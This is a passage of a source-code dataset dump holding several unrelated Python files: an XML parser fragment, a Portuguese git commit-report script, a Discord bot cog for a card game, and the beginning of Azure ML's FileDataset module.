endedXmlDoc:\n\t\t\t\t\tcurrentObject = {}\n\t\t\telif seenOpeningTag:\n\t\t\t\tcurrentTag += c\n\t\t\telse:\n\t\t\t\tworkspace += c\n\t\treturn None\n\n\t@staticmethod\n\tdef factory(input, isFile=False):\n\t\t\"\"\"\n\t\t\tbuild a single document given an input\n\t\t\"\"\"\n\t\tresult = list(Document.factoryMultiple(input, isFile))\n\n\t\tif len(result) > 0:\n\t\t\treturn result[0]\n\t\treturn None\n\n\t@staticmethod\n\tdef factoryMultiple(input, isFile=False, isSingle=True):\n\t\t\"\"\"\n\t\t\tbuild multiple documents given an input\n\t\t\"\"\"\n\n\t\tcharMethod = Document.returnCharsFromString\n\n\t\tif isFile:\n\t\t\tcharMethod = Document.returnCharsFromDocument\n\n\t\ttagStack = []\n\t\tcurrentTag = \"\"\n\t\tcurrentObject = {}\n\n\t\tseenOpeningTag = False\n\t\tseenClosingTag = False\n\t\tseenClosingXml = False\n\t\tworkspace = \"\"\n\n\t\tfor c in charMethod(input):\n\t\t\tif c == \"<\":\n\t\t\t\tseenOpeningTag = True\n\n\t\t\t\ttagStackLen = len(tagStack)\n\n\t\t\t\tif tagStackLen > 0:\n\t\t\t\t\tlastTag = tagStack[tagStackLen - 1]\n\t\t\t\t\tif lastTag in currentObject:\n\t\t\t\t\t\tcurrentObject[lastTag].append(workspace)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurrentObject[lastTag] = [workspace]\n\n\t\t\t\tcurrentTag = \"\"\n\t\t\t\tworkspace = \"\"\n\t\t\telif c == \"/\" and seenOpeningTag:\n\t\t\t\tseenClosingXml = True\n\t\t\telif c == \">\" and seenOpeningTag:\n\t\t\t\t# remove the last one\n\t\t\t\tif seenClosingXml and len(tagStack) > 0:\n\t\t\t\t\ttagStack.pop()\n\t\t\t\telse:\n\t\t\t\t\ttagStack.append(currentTag)\n\n\t\t\t\tseenOpeningTag = False\n\t\t\t\tseenClosingXml = False\n\t\t\t\tseenClosingTag = False\n\t\t\t\tworkspace = \"\"\n\n\t\t\t\tif len(tagStack) == 0:\n\t\t\t\t\tyield Document.build(currentObject)\n\n\t\t\t\t\t# don't want to compute more than we have to...\n\t\t\t\t\tif isSingle:\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\tcurrentObject = {}\n\n\t\t\telif seenOpeningTag:\n\t\t\t\tcurrentTag += c\n\t\t\telse:\n\t\t\t\tworkspace += c","sub_path":"src/extract/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"513336627","text":"import git\nimport os\nimport datetime\nimport argparse\nfrom re import search\n\ndef validateDate(date_text):\n if (date_text != None):\n try:\n datetime.datetime.strptime(str(date_text), '%Y-%m-%d')\n except Exception as e:\n raise Exception(\"Formato de data inválido, deve ser YYYY-MM-DD\")\n\ndef validateChave(chave):\n if (chave != None):\n chave = str(chave)\n if (chave.startswith(\"C\") != True or len(chave) != 8):\n raise Exception(\"Formato de chave inválido!\")\n\ndef validateTextoBusca(texto):\n if (texto != None):\n texto = str(texto)\n if(len(texto) > 0):\n print(\"\")\n print(\"Texto de Busca a aplicar: \" + texto)\n print(\"\")\n else:\n raise Exception(\"Texto de Busca nao foi fornecido!\")\n\n\ndef montarFiltroLog(args):\n filtro = []\n filtro.append(\"git\")\n filtro.append(\"rev-list\")\n filtro.append(\"--remotes\")\n\n if (args.start_date):\n filtro.append('--after=' + str(args.start_date) + 'T00:00:01')\n if (args.end_date):\n filtro.append('--until=' + args.end_date + 'T23:59:59')\n if (args.key):\n filtro.append('--author=' + args.key)\n\n # if (len(filtro) > 0):\n # filtro.append(\"--pretty=format:%H\")\n\n if (args.texto_busca):\n filtro.append('--grep=' + args.texto_busca)\n\n print(\"\")\n print(\"Comando executado:\")\n print(filtro)\n print(\"\")\n\n return filtro\n\ndef isArgumentoInformado(args):\n return (args.start_date or args.end_date or args.key or args.hash or args.texto_busca)\n\n# Definição dos argumentos de filtro\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--start-date\", \"-sd\", help=\"Data inicial do commit padrão (YYYY-mm-dd)\")\nparser.add_argument(\"--end-date\", \"-ed\", help=\"Data final do commit (YYYY-mm-dd)\")\nparser.add_argument(\"--key\", \"-k\", help=\"Chave C do usuário que realizou o commit\")\nparser.add_argument(\"--hash\", \"-ha\", help=\"Hash do commit a ser analisado\")\nparser.add_argument(\"--texto-busca\", \"-tb\", help=\"Texto a buscar nas mensagens de log dos commits. Exemplo: task 123456.\")\n\n# Leitura dos argumentos\ninputArgs = parser.parse_args()\n\ndirpath = os.getcwd()\nfoldername = os.path.basename(dirpath) + \"/\"\narquivosNovos = []\narquivosModificados = []\n\ng = git.Git(dirpath.replace(\"\\\\\",\"/\"))\n\nif (not isArgumentoInformado(inputArgs)):\n print(\"É necessário informar pelo menos um dos argumentos usados no filtro dos commits. Execute o programa com a opção --help ou -h\")\nelse:\n\n if (inputArgs.hash):\n print(\"Coletando dados dos arquivos criados...\")\n\n loginfoAdicionados = g.execute([\"git\", \"show\", str(inputArgs.hash), \"--name-status\", \"--pretty=oneline\", \"--abbrev-commit\", \"--diff-filter=A\"])\n linhasAdicionados = loginfoAdicionados.splitlines()\n\n if len(linhasAdicionados) > 0:\n arquivosNovos = arquivosNovos + list(\n map(lambda x: foldername + x.replace('A\\t', '') + '#' + str(inputArgs.hash)[0:10], linhasAdicionados))\n\n print(\"Coletando dados dos arquivos modificados...\")\n\n loginfoModificados = g.execute([\"git\", \"show\", str(inputArgs.hash), \"--name-status\", \"--pretty=oneline\", \"--abbrev-commit\", \"--diff-filter=M\"])\n linhasModificados = loginfoModificados.splitlines()\n\n if len(linhasModificados) > 0:\n arquivosModificados = arquivosModificados + list(\n map(lambda x: foldername + x.replace('MM\\t', '').replace('M\\t', '') + '#' + str(inputArgs.hash)[0:10],\n linhasModificados))\n\n arquivosNovosSet = set(arquivosNovos)\n arquivosModificadosSet = set(arquivosModificados)\n\n for novo in arquivosNovos:\n arquivo = novo[:novo.index(\"#\")]\n\n if (arquivo != foldername and arquivo.find(\".\")):\n iguais = set(filter(lambda nome: search(arquivo, nome), arquivosModificados))\n try:\n arquivosModificadosSet = arquivosModificadosSet.difference(iguais)\n except ValueError:\n pass\n\n arquivosNovos = list(arquivosNovosSet)\n arquivosModificados = list(arquivosModificadosSet)\n\n arquivosNovos.sort(key=lambda f: os.path.splitext(f)[1])\n arquivosModificados.sort(key=lambda f: os.path.splitext(f)[1])\n\n print('_______________Arquivos Novos_______________')\n extensaoAnterior = ''\n for x in arquivosNovos:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x.strip(\" \"))\n\n print('_______________Arquivos Modificados_______________')\n extensaoAnterior = ''\n for x in arquivosModificados:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x)\n\n else:\n validateDate(inputArgs.start_date)\n validateDate(inputArgs.end_date)\n validateChave(inputArgs.key)\n validateTextoBusca(inputArgs.texto_busca)\n filtroLog = montarFiltroLog(inputArgs)\n\n try:\n logCommits = g.execute(filtroLog)\n print(\"=\"*40)\n print(\"COMMITS ENCONTRADOS\")\n print(\"=\"*40)\n print(logCommits)\n commitsList = logCommits.splitlines()\n print(\"=\"*40)\n print(\"Total de COMMITS: {}\".format(len(commitsList)))\n print(\"=\"*40)\n\n print(\"Coletando dados dos arquivos criados...\")\n for commit in commitsList:\n loginfoAdicionados = g.execute([\"git\", \"show\", commit,\"--name-status\",\"--pretty=oneline\",\"--abbrev-commit\",\"--diff-filter=A\"])\n linhasAdicionados = loginfoAdicionados.split('\\n')\n\n if len(linhasAdicionados) > 0:\n arquivosNovos = arquivosNovos + list(map(lambda x: foldername + x.replace('A\\t','') + '#' + commit[0:10], linhasAdicionados))\n\n print(\"Coletando dados dos arquivos modificados...\")\n for commit in commitsList:\n loginfoModificados = g.execute([\"git\", \"show\", commit,\"--name-status\",\"--pretty=oneline\",\"--abbrev-commit\",\"--diff-filter=M\"])\n linhasModificados = loginfoModificados.split('\\n')\n\n if len(linhasModificados) > 0:\n arquivosModificados = arquivosModificados + list(map(lambda x: foldername + x.replace('MM\\t','').replace('M\\t','') + '#' + commit[0:10], linhasModificados))\n\n arquivosNovosSet = set(arquivosNovos)\n arquivosModificadosSet = set(arquivosModificados)\n\n for novo in arquivosNovos:\n arquivo = novo[:novo.index(\"#\")]\n\n if (arquivo != foldername and arquivo.find(\".\")):\n iguais = set(filter(lambda nome: search(arquivo, nome), arquivosModificados))\n try:\n arquivosModificadosSet = arquivosModificadosSet.difference(iguais)\n except ValueError:\n pass\n\n arquivosNovos = list(arquivosNovosSet)\n arquivosModificados = list(arquivosModificadosSet)\n\n arquivosNovos.sort(key=lambda f: os.path.splitext(f)[1])\n arquivosModificados.sort(key=lambda f: os.path.splitext(f)[1])\n\n print(\"=\"*40)\n print('_____________Arquivos Novos_____________')\n print(\"=\"*40)\n extensaoAnterior = ''\n for x in arquivosNovos:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x.strip(\" \"))\n\n print(\"=\"*40)\n print('__________Arquivos Modificados__________')\n print(\"=\"*40)\n extensaoAnterior = ''\n for x in arquivosModificados:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x)\n\n except Exception as e:\n print(\"Ocorreu uma exceção durante a execução do programa, provavelmente o filtro informado não retornou dados \" + e)","sub_path":"gerador-relatorio-atividades.py","file_name":"gerador-relatorio-atividades.py","file_ext":"py","file_size_in_byte":8726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"390061827","text":"import discord\r\nimport pygsheets\r\nfrom db_engine import *\r\nfrom discord.ext import commands\r\nfrom difflib import get_close_matches\r\n\r\n\r\nclass Players(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.helpers = self.bot.get_cog('Helpers')\r\n\r\n @commands.command(name='show', aliases=['card', 'player'], help='show ')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def display_player(self, ctx, cardset, *, name):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n yp_query = Player.select(Player.name).where(Player.cardset == cardset)\r\n yearly_players = []\r\n for x in yp_query:\r\n yearly_players.append(x.name.lower())\r\n\r\n try:\r\n great_match = get_close_matches(name.lower(), yearly_players, cutoff=0.75)[0]\r\n this_guy = Player.get((fn.Lower(Player.name) == great_match.lower()), Player.cardset == cardset)\r\n\r\n embed = await self.helpers.get_player_embed(this_guy)\r\n\r\n await self.helpers.send_to_bothole(ctx, None, embed)\r\n\r\n except Exception as e:\r\n await ctx.send(f'I could not find {name.title()}. Is that the right year?')\r\n print(f'**ERROR** (display_player): {e}')\r\n\r\n @commands.command(name='roster', aliases=['team'], help='Show your active roster')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def get_inventory(self, ctx, *abbrev):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n if abbrev:\r\n team = Team.get_or_none(Team.abbrev == abbrev[0].upper())\r\n if not team:\r\n await ctx.send(f'I couldn\\'t find **{abbrev}**. Is that the team\\'s abbreviation?')\r\n return\r\n else:\r\n team = Team.get_by_owner(ctx.author.id)\r\n if not team:\r\n await ctx.send(f'What team are you searching for?')\r\n return\r\n\r\n embed = self.helpers.get_active_roster(team, f'{self.bot.get_user(team.gmid).avatar_url}')\r\n\r\n await self.helpers.send_to_bothole(ctx, content=f'{ctx.author.mention}', embed=embed)\r\n\r\n @commands.command(name='in', help='Get Paper Dynasty Players role')\r\n async def give_role(self, ctx, *args):\r\n await ctx.author.add_roles(discord.utils.get(ctx.guild.roles, name='Paper Dynasty Players'))\r\n await ctx.send('I got u, boo. ;)')\r\n\r\n @commands.command(name='out', help='Remove Paper Dynasty Players role')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def take_role(self, ctx, *args):\r\n await ctx.author.remove_roles(discord.utils.get(ctx.guild.roles, name='Paper Dynasty Players'))\r\n await ctx.send('Oh no! I\\'m so sad to see you go! What are we going to do without you?')\r\n\r\n @commands.command(name='teams', help='List all teams')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def list_teams(self, ctx, *args):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n all_teams = Team.select()\r\n\r\n # Collect rarity objects\r\n try:\r\n rar_mvp = Rarity.get(Rarity.name == 'MVP')\r\n rar_als = Rarity.get(Rarity.name == 'All-Star')\r\n rar_sta = Rarity.get(Rarity.name == 'Starter')\r\n rar_res = Rarity.get(Rarity.name == 'Reserve')\r\n rar_rpl = Rarity.get(Rarity.name == 'Replacement')\r\n except Exception as e:\r\n print(f'**Error**: (players inv getrars) - {e}')\r\n return\r\n\r\n embed = discord.Embed(title='All Teams', color=0xdeeadd)\r\n\r\n # Build embed\r\n for x in all_teams:\r\n mvps, alss, stas, ress, reps = 0, 0, 0, 0, 0\r\n roster = Roster.get_cards(team=x)\r\n\r\n for p in roster:\r\n if p.player.rarity == rar_mvp:\r\n mvps += 1\r\n elif p.player.rarity == rar_als:\r\n alss += 1\r\n elif p.player.rarity == rar_sta:\r\n stas += 1\r\n elif p.player.rarity == rar_res:\r\n ress += 1\r\n else:\r\n reps += 1\r\n\r\n un_packs = Pack.select(Pack.id).where((Pack.team == x) & (Pack.card1.is_null())).count()\r\n op_packs = Pack.select(Pack.id).where((Pack.team == x) & (Pack.card1.is_null(False))).count()\r\n\r\n embed.add_field(\r\n name=f'{x.lname}',\r\n value=f'GM: {x.gmname}\\n'\r\n f'Packs (Unopen): {op_packs + un_packs} ({un_packs})\\n\\n'\r\n f'MVPs: {mvps}\\n'\r\n f'All-Stars: {alss}\\n'\r\n f'Starters: {stas}\\n'\r\n f'Reserves: {ress}\\n'\r\n f'Replacements: {reps}\\n------\\n'\r\n f'Collection Value: {self.helpers.get_team_value(x)}')\r\n\r\n await self.helpers.send_to_bothole(ctx, content=f'{ctx.author.mention}', embed=embed)\r\n\r\n @commands.command(name='result', help='Log your game results')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def result(self, ctx, awayabbrev: str, awayscore: int, homeabbrev: str, homescore: int):\r\n # Validate teams listed\r\n try:\r\n awayteam = Team.get(Team.abbrev == awayabbrev.upper())\r\n hometeam = Team.get(Team.abbrev == homeabbrev.upper())\r\n print(f'Final: {awayabbrev} {awayscore} - {homescore} {homeabbrev}')\r\n except Exception as e:\r\n error = f'**ERROR:** {type(e).__name__} - {e}'\r\n print(error)\r\n await ctx.message.add_reaction('❌')\r\n await ctx.send(f'Hey, {ctx.author.mention}, I couldn\\'t find the teams you mentioned. You put '\r\n f'**{awayabbrev}** as the away team and **{homeabbrev}** as the home team.')\r\n return\r\n\r\n earnings = {'away': 0, 'home': 0}\r\n earnings_away = []\r\n earnings_home = []\r\n\r\n # Check author then log result\r\n if ctx.author.id in [awayteam.gmid, awayteam.gmid2, hometeam.gmid, hometeam.gmid2] \\\r\n or ctx.author.id == self.bot.owner_id:\r\n this_result = Result(week=Current.get_by_id(1).week,\r\n awayteam=awayteam, hometeam=hometeam,\r\n awayscore=awayscore, homescore=homescore,\r\n season=Current.get_by_id(1).season)\r\n this_result.save()\r\n await self.helpers.pause_then_type(ctx, f'Just logged {awayteam.abbrev.upper()} {awayscore} - '\r\n f'{homescore} {hometeam.abbrev.upper()}')\r\n await ctx.message.add_reaction('✅')\r\n\r\n # Credit pack for win\r\n if awayscore > homescore:\r\n earnings['away'] += 1\r\n earnings_away.append('- 1 pack for the win\\n')\r\n else:\r\n earnings['home'] += 1\r\n earnings_home.append('- 1 pack for the win\\n')\r\n\r\n away_team_value = self.helpers.get_team_value(awayteam)\r\n home_team_value = self.helpers.get_team_value(hometeam)\r\n delta = away_team_value - home_team_value\r\n if delta < 0:\r\n increments = divmod(-delta, self.helpers.TEAM_DELTA_CONSTANT)\r\n print(f'increments: {increments}')\r\n packs = min(increments[0], 5)\r\n if packs > 0:\r\n earnings['away'] += packs\r\n earnings_away.append(f'- {packs} pack{\"s\" if packs > 1 else \"\"} for underdog\\n')\r\n else:\r\n increments = divmod(delta, self.helpers.TEAM_DELTA_CONSTANT)\r\n print(f'increments: {increments}')\r\n packs = min(increments[0], 5)\r\n if packs > 0:\r\n earnings['home'] += packs\r\n earnings_home.append(f'- {packs} pack{\"s\" if packs > 1 else \"\"} for underdog\\n')\r\n\r\n print(f'earn away: {earnings[\"away\"]} / earn home: {earnings[\"home\"]}')\r\n away_packs_remaining = Current.get_by_id(1).packlimit - awayteam.weeklypacks\r\n home_packs_remaining = Current.get_by_id(1).packlimit - hometeam.weeklypacks\r\n away_final_earnings = away_packs_remaining if away_packs_remaining >= earnings[\"away\"] else earnings[\"away\"]\r\n home_final_earnings = home_packs_remaining if home_packs_remaining >= earnings[\"home\"] else earnings[\"home\"]\r\n print(f'away_final_earnings: {away_final_earnings}')\r\n print(f'home_final_earnings: {home_final_earnings}')\r\n\r\n # TODO: Seems to be giving underdog the square of their earnings\r\n economy = self.bot.get_cog('Economy')\r\n if earnings[\"away\"] > 0:\r\n print(f'away_final_earnings: {away_final_earnings}')\r\n economy.give_pack(awayteam, away_final_earnings)\r\n if earnings[\"home\"] > 0:\r\n print(f'home_final_earnings: {home_final_earnings}')\r\n economy.give_pack(hometeam, home_final_earnings)\r\n\r\n embed = discord.Embed(title=f'{awayteam.sname} {awayscore} - {homescore} {hometeam.sname}',\r\n description='Score Report / Post Game Earnings')\r\n embed.add_field(name=awayteam.lname,\r\n value=f'Team Value: {away_team_value}\\n\\n'\r\n f'**Earn: {earnings[\"away\"]} pack{\"s\" if earnings[\"away\"] != 1 else \"\"}**'\r\n f' (limit {away_final_earnings})\\n'\r\n f'{\"Summary:\" if len(earnings_away) > 0 else \"\"}\\n'\r\n f'{earnings_away[0] if len(earnings_away) > 0 else \"\"}'\r\n f'{earnings_away[1] if len(earnings_away) > 1 else \"\"}',\r\n inline=False)\r\n embed.add_field(name=hometeam.lname,\r\n value=f'Team Value: {home_team_value}\\n\\n'\r\n f'**Earn: {earnings[\"home\"]} pack{\"s\" if earnings[\"home\"] != 1 else \"\"}**'\r\n f' (limit {home_final_earnings})\\n'\r\n f'{\"Summary:\" if len(earnings_home) > 0 else \"\"}\\n'\r\n f'{earnings_home[0] if len(earnings_home) > 0 else \"\"}'\r\n f'{earnings_home[1] if len(earnings_home) > 1 else \"\"}',\r\n inline=False)\r\n await self.helpers.send_to_news(ctx, None, embed)\r\n\r\n @commands.command(name='sheet', aliases=['google'], help='Link to your roster sheet')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def get_roster_command(self, ctx):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n team = Team.get_by_owner(ctx.author.id)\r\n if not team:\r\n await ctx.send(f'Do you have a team? I don\\'t see your name here...')\r\n return\r\n\r\n await ctx.send(f'{ctx.author.mention}\\n{team.lname} Roster Sheet: <{self.helpers.get_roster_sheet(team)}>')\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Players(bot))\r\n","sub_path":"cogs/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":11527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"97835448","text":"# ---------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# ---------------------------------------------------------\n\n\"\"\"Contains functionality for referencing single or multiple files in datastores or public URLs.\n\nFor more information, see the article [Add & register\ndatasets](https://docs.microsoft.com/azure/machine-learning/how-to-create-register-datasets).\nTo get started working with a file dataset, see https://aka.ms/filedataset-samplenotebook.\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport tempfile\nimport uuid\n\nfrom azureml._common.exceptions import AzureMLException\nfrom azureml._tracing import get_tracer\nfrom azureml.data.abstract_dataset import AbstractDataset, _get_path_from_step\nfrom azureml.data._dataprep_helper import dataprep, dataprep_fuse, get_dataflow_for_execution\nfrom azureml.data._loggerfactory import track, _LoggerFactory\nfrom azureml.data.constants import _PUBLIC_API\nfrom azureml.data.dataset_error_handling import _try_execute, _construct_message_and_check_exception_type, \\\n _dataprep_error_handler\nfrom azureml.exceptions import UserErrorException\n\n\n_logger = None\n_tracer = None # type: Optional[AmlTracer]\n\n\ndef _get_logger():\n global _logger\n if _logger is None:\n _logger = _LoggerFactory.get_logger(__name__)\n return _logger\n\n\ndef _get_tracer():\n global _tracer\n if _tracer is None:\n _tracer = get_tracer(__name__)\n return _tracer\n\n\nclass FileDataset(AbstractDataset):\n \"\"\"Represents a collection of file references in datastores or public URLs to use in Azure Machine Learning.\n\n A FileDataset defines a series of lazily-evaluated, immutable operations to load data from the\n data source into file streams. Data is not loaded from the source until FileDataset is asked to deliver data.\n\n A FileDataset is created using the :func:`azureml.data.dataset_factory.FileDatasetFactory.from_files` method\n of the FileDatasetFactory class.\n\n For more information, see the article `Add & register\n datasets `_.\n To get started working with a file dataset, see https://aka.ms/filedataset-samplenotebook.\n\n .. remarks::\n\n FileDataset can be used as input of an experiment run. It can also be registered to workspace\n with a specified name and be retrieved by that name later.\n\n FileDataset can be subsetted by invoking different subsetting methods available on this class.\n The result of subsetting is always a new FileDataset.\n\n The actual data loading happens when FileDataset is asked to deliver the data into another\n storage mechanism (e.g. files downloaded or mounted to local path).\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize the FileDataset object.\n\n This constructor is not supposed to be invoked directly. Dataset is intended to be created using\n :class:`azureml.data.dataset_factory.FileDatasetFactory` class.\n \"\"\"\n super().__init__()\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def to_path(self):\n \"\"\"Get a list of file paths for each file stream defined by the dataset.\n\n .. remarks::\n The file paths are relative paths for local files when the file streams are downloaded or mounted.\n\n A common prefix will be removed from the file paths based on how data source was\n specified to create the dataset. For example:\n\n .. code-block:: python\n\n datastore = Datastore.get(workspace, 'workspaceblobstore')\n dataset = Dataset.File.from_files((datastore, 'animals/dog/year-*/*.jpg'))\n print(dataset.to_path())\n\n # ['year-2018/1.jpg'\n # 'year-2018/2.jpg'\n # 'year-2019/1.jpg']\n\n dataset = Dataset.File.from_files('https://dprepdata.blob.core.windows.net/demo/green-small/*.csv')\n\n print(dataset.to_path())\n # ['/green_tripdata_2013-08.csv']\n\n :return: Returns an array of file paths.\n :rtype: builtin.list(str)\n \"\"\"\n return self._to_path(activity='to_path')\n\n def _to_path(self, activity):\n dataflow, portable_path = _add_portable_path_column(self._dataflow)\n dataflow = get_dataflow_for_execution(dataflow, activity, 'FileDataset')\n records = dataflow._to_pyrecords()\n return [r[portable_path] for r in records]\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def download(self, target_path=None, overwrite=False):\n \"\"\"Download file streams defined by the dataset as local files.\n\n .. remarks::\n\n If target_path starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the current working directory.\n\n :param target_path: The local directory to download the files to. If None, the data will be downloaded\n into a temporary directory.\n :type target_path: str\n :param overwrite: Indicates whether to overwrite existing files. The default is False. Existing files will\n be overwritten if overwrite is set to True; otherwise an exception will be raised.\n :type overwrite: bool\n :return: Returns an array of file paths for each file downloaded.\n :rtype: builtin.list(str)\n \"\"\"\n with _get_tracer().start_as_current_span('download', user_facing_name='Dataset.download') as span:\n target_path = _ensure_path(target_path)\n download_list = [os.path.abspath(os.path.join(target_path, '.' + p))\n for p in self._to_path(activity='download.to_path')]\n\n if self.id:\n span.set_user_facing_attribute('dataset_id', self.id)\n span.set_user_facing_attribute('target_path', target_path)\n\n if not overwrite:\n for p in download_list:\n # encode p to avoid UnicodeEncodeError from os.path.exists\n if os.path.exists(_encode_if_needed(p)):\n raise UserErrorException('File \"{}\" already exists. Set overwrite=True to overwrite it.'\n .format(p))\n base_path = dataprep().api.datasources.LocalFileOutput(target_path)\n\n dataflow, portable_path = _add_portable_path_column(self._dataflow)\n dataflow = dataflow.write_streams(\n streams_column='Path',\n base_path=base_path,\n file_names_column=portable_path)\n\n dataflow = get_dataflow_for_execution(dataflow, 'download', 'FileDataset')\n _try_execute(dataflow.run_local,\n 'download',\n None if self.id is None else {'id': self.id, 'name': self.name, 'version': self.version})\n return download_list\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def mount(self, mount_point=None, **kwargs):\n \"\"\"Create a context manager for mounting file streams defined by the dataset as local files.\n\n .. remarks::\n\n A context manager will be returned to manage the lifecycle of the mount. To mount, you will need to\n enter the context manager and to unmount, exit from the context manager.\n\n Mount is only supported on Unix or Unix-like operating systems and libfuse must be present. If you\n are running inside a docker container, the docker container must be started with the `--privileged` flag\n or started with `--cap-add SYS_ADMIN --device /dev/fuse`.\n\n .. code-block:: python\n\n datastore = Datastore.get(workspace, 'workspaceblobstore')\n dataset = Dataset.File.from_files((datastore, 'animals/dog/year-*/*.jpg'))\n\n with dataset.mount() as mount_context:\n # list top level mounted files and folders in the dataset\n os.listdir(mount_context.mount_point)\n\n # You can also use the start and stop methods\n mount_context = dataset.mount()\n mount_context.start() # this will mount the file streams\n mount_context.stop() # this will unmount the file streams\n\n If target_path starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the current working directory.\n\n :param mount_point: The local directory to mount the files to. If None, the data will be mounted into a\n temporary directory, which you can find by calling the `MountContext.mount_point` instance method.\n :type mount_point: str\n :return: Returns a context manager for managing the lifecycle of the mount.\n :rtype: azureml.dataprep.fuse.daemon.MountContext\n \"\"\"\n try:\n mount = dataprep_fuse().mount\n except ValueError as e:\n if 'Invalid mount arguments' in str(e):\n raise UserErrorException(e)\n raise AzureMLException(\"Execution failed unexpectedly due to: {}\".format(str(e)))\n except OSError as e:\n raise UserErrorException('Mount is only supported on Unix or Unix-like operating systems and the '\n 'FUSE library must be present. For more information, please refer to the '\n 'remarks section of FileDataset.mount\\'s documentation. Execution failed'\n 'unexpectedly due to {}'.format(e.__class__.__name__))\n except Exception as e:\n raise AzureMLException(\"Mount failed unexpectedly due to: {}\".format(str(e)))\n\n mount_point = _ensure_path(mount_point)\n if os.path.ismount(mount_point):\n raise UserErrorException('\"{0}\" is already mounted. Run `sudo umount \"{0}\"` to unmount it.'\n .format(mount_point))\n\n if not os.path.exists(mount_point):\n os.makedirs(mount_point)\n\n invocation_id = str(uuid.uuid4())\n dataflow = get_dataflow_for_execution(self._dataflow, 'mount.find_prefix', 'FileDataset',\n invocation_id=invocation_id)\n base_path = _find_path_prefix(dataflow)\n dataflow = get_dataflow_for_execution(self._dataflow, 'mount', 'FileDataset',\n invocation_id=invocation_id)\n mount_options = kwargs.get('mount_options', None)\n skip_validate = kwargs.get('skip_validate', False)\n\n if not skip_validate:\n try:\n is_invalid = dataflow.has_invalid_source(return_validation_error=True)\n if is_invalid is not False: # This means that the source is invalid\n raise UserErrorException(\"Cannot mount Dataset(id='{}', name='{}', version={}). \"\n \"Source of the dataset is either not \"\n \"accessible or does not contain any data. \"\n \"Error Message: {}\".format(self.id, self.name, self.version, is_invalid))\n except TypeError:\n # This catch is for backwards compatibility. There are valid version combinations of dataprep\n # and core where dataflow.has_invalid_source will not have the return_validation_error parameter,\n # which the above call will throw a TypeError.\n if dataflow.has_invalid_source(): # This means that the source is invalid\n raise UserErrorException(\"Cannot mount dataset. Source of the dataset is either not \"\n \"accessible or does not contain any data. \")\n except AttributeError:\n # This catch is for backwards compatibility. There are valid version combinations of dataprep\n # and core where Dataflow will not have the has_invalid_source method.\n pass\n except UserErrorException:\n raise\n except AzureMLException:\n raise\n except Exception as e:\n dataset_info = None if self.id is None else {'id': self.id, 'name': self.name, 'version': self.version}\n message, is_dprep_exception = _construct_message_and_check_exception_type(e, dataset_info, \"mount\")\n _logger.error(message)\n _dataprep_error_handler(e, message, is_dprep_exception)\n\n return mount(\n dataflow=dataflow,\n files_column='Path',\n mount_point=mount_point,\n base_path=base_path,\n options=mount_options,\n foreground=False,\n invocation_id=invocation_id)\n\n def as_mount(self, path_on_compute=None):\n \"\"\"Create a DatasetConsumptionConfig with the mode set to mount.\n\n In the submitted run, files in the datasets will be mounted to local path on the compute target.\n The mount point can be retrieved from argument values and the input_datasets field of the run context.\n We will automatically generate an input name. If you would like specify a custom input name, please call\n the as_named_input method.\n\n .. code-block:: python\n\n # Given a run submitted with dataset input like this:\n dataset_input = dataset.as_mount()\n experiment.submit(ScriptRunConfig(source_directory, arguments=[dataset_input]))\n\n\n # Following are sample codes running in context of the submitted run:\n\n # The mount point can be retrieved from argument values\n import sys\n mount_point = sys.argv[1]\n\n # The mount point can also be retrieved from input_datasets of the run context.\n from azureml.core import Run\n mount_point = 